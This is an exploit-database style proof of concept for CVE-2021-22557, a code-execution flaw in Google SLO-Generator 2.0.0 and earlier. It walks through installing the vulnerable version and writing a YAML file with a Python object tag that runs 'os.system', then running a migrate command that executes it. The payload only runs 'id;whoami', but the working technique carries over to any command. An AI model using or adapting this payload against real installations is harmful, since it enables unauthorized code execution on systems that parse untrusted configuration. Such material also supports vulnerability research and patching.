# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution # Date: 2021-09-28 # Exploit Author: Kiran Ghimire # Software Link: https://github.com/google/slo-generator/releases # Version: <= 2.0.0 # Tested on: Linux # CVE: CVE-2021-22557 ############################################################################## *Introduction*: Is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format. ############################################################################## *POC:* 1. pip3 install slo-generator==2.0.0 2. 2. Save the below yaml code in a file as exploit.yaml. !!python/object/apply:os.system ["id;whoami"] 3. Run the below command slo-generator migrate -b exploit.yaml ##############################################################################